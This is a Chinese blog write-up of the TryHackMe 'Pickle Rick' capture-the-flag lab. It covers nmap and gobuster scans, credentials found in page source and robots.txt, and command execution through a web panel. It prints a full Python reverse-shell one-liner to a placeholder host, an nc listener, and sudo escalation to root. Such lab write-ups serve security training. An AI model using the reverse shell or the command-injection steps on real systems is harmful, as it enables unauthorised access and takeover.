Pickle Rick

最新推荐文章于 2024-05-21 14:27:58 发布
最新推荐文章于 2024-05-21 14:27:58 发布
阅读量35 收藏
点赞数
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50605813/article/details/132843317
版权

1.What is the first ingredient that Rick needs?

2.What is the second ingredient in Rick’s potion?

3.What is the last and final ingredient?


What is the first ingredient that Rick needs?

首先登录到指定的ip地址,看到如下页面。
在这里插入图片描述


用nmap扫描目标namp -sC -sV x.x.x.x,在此期间我们鼠标右键查看源代码,注意到注释好像给了一个登录账号的用户名——R1ckRul3s

在这里插入图片描述


用Gobuster进行目录扫描,我们可以扫描到一个登录界面——/login.php

gobuster dir -u http://X.X.X.X -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,js,css,py

在这里插入图片描述


进入login.php页面,目前我们已经得知了登录的用户名,我们可以在robots.txt页面找到登录密码——Wubbalubbadubdub
在这里插入图片描述

登录成功后我们进入了一个拥有命令行执行功能的页面,我们可以使用“ls”命令列出当前路径下的文件,看到第一个文件有点可疑,我们通过输入“less 文件名”命令来读取其中的内容,得到第一个问题的答案——mr. meeseek hair。(这里不使用cat命令进行读取是因为cat命令被过滤了,详细可以执行grep -R .来查看具体的信息)。

在这里插入图片描述


What is the second ingredient in Rick’s potion?

既然可以这个页面可以执行我们输入的指令,我们就可以尝试去获取shell,前面我们通过nmap扫描结果看到目标开启了ssh服务,这里我们通过输入一段命令 `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`,让目前机器执行一段反向shell脚本代码,与此同时我们在本地监听对应的1234端口(可以自定义)`nc -lvnp 1234`。

在这里插入图片描述


当我们获得shell之后,输入命令python3 -c 'import pty;pty.spawn("/bin/bash")',再次输入命令sudo bash即可获得root权限。

在这里插入图片描述


此时我们cd /home来到home路径下使用ls查看用户,看到rick,我们cd rick进入rick,通过ls看到这里是第二个成分,cat *直接读取,得到第二个成分——jerry tear
在这里插入图片描述


What is the last and final ingredient?

接着刚才的操作,现在我们回到/root路径下,查看那里是否有我们想要的第三个成分,`cd /root`切换到root路径下,`ls`查看,看到了有趣的文件3rd.txt,直接`cat 3rd.txt`打开,得到第三个成分——`fleeb juice`。

在这里插入图片描述



感觉要坏掉了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Pickle Rick 腌黄瓜瑞克STL分件模型
04-12
腌黄瓜瑞克的STL分件模型,可用于3D打印。
c3d.pickle
05-06
C3D:使用3D卷积网络学习时空特征 行为识别:C3D network-用于视频特征提取的3维卷积网络
TryHackMe靶机- Pickle Rick
Che_ng的博客
03-18 185
TryHackMe靶机- Pickle Rick
TryHackMe-Pickle_Rick
M1n9K1n9的博客
01-05 188
瑞克和莫蒂的CTF。帮助瑞克变回人类!
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 373
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
THM学习笔记——Pickle Rick
jiangyu0_0的博客
01-30 495
发现登录框,猜测Wubbalubbadubdub为密码,结合在源代码里找到的用户名,登录。继续打开其他文件找寻有用信息。在系统文件中寻找其他成分。发现目标信息 rick。使用dirsearch。
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 891
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
【土木人自学网安Day4】靶场Pickle Rick
qq_44117967的博客
02-29 398
发现还是没有内容,这时只有考虑提权进入root文件夹看看有没有线索,提权操作有两种思路,第一个是使用sudo+命令,可以达到root用户的权限,第二个是自身变成root用户,这里先尝试下是否可以用sudo命令以及可以使用sudo命令的范围,可通过sudo -l查看。这时查看一下还有什么命令能使用,这里先试用which ls 查看我们的ls命令所在的位置,发现为/bin/ls ,下一步我们使用cd /bin && ls 结合命令查看/bin下有哪些还能使用的命令。成功拿到第二个线索,也获得了flag。
TryHackMe-Pickle Rick练习
m0_74606212的博客
01-21 338
TryHackMe-Pickle Rick练习
Tryhackme靶机-Pickle Rick wp
m0_64777251的博客
04-10 392
发现22 80 端口开放访问80端口这里图片卡了没显示图片是这样就是用burpsuite 爆破吧查看页面源代码发现username:R1ckRul3s目录爆破发现几个可以访问的目录 依次访问有个login.php 账号是源代码里的那个然后密码是robots.txt里那一串我这里直接登陆了 上面就是登录后的页面 一个命令执行框输入 ls -al 有这么多的文件读取一下clue.txt Sup3rS3cretPickl3Ingred.txt第一个是提示我们在别的文件里也可以找找。
Rick_pickle
m0_73255659的博客
03-14 674
真的很简单没啥说的…
Python pickle模块用法实例
09-22
主要介绍了Python pickle模块用法实例,python的pickle模块实现了基本的数据序列和反序列化,需要的朋友可以参考下
pickle与struct模块简介
03-22
pickle与struct模块简介
Python序列化pickle模块使用详解
09-17
主要介绍了Python序列化pickle模块使用详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 773
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 850
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-18 1106
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
SSL协议:网络安全通信的守护者
最新发布
jiamisoft的博客
05-21 422
SSL协议最初由网景公司开发,旨在解决HTTP协议传输过程中的安全问题。SSL通过在传输层和应用层之间增加一个安全层,为网络通信提供了加密、身份验证和数据完整性保护。
Python Pickle
09-15
Python中的pickle模块实现了对Python对象结构的二进制序列化和反序列化。通过pickle,我们可以将Python对象转换为字节流,然后将其保存到文件或发送给其他程序使用。反序列化是将这些字节流重新转换为Python对象的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值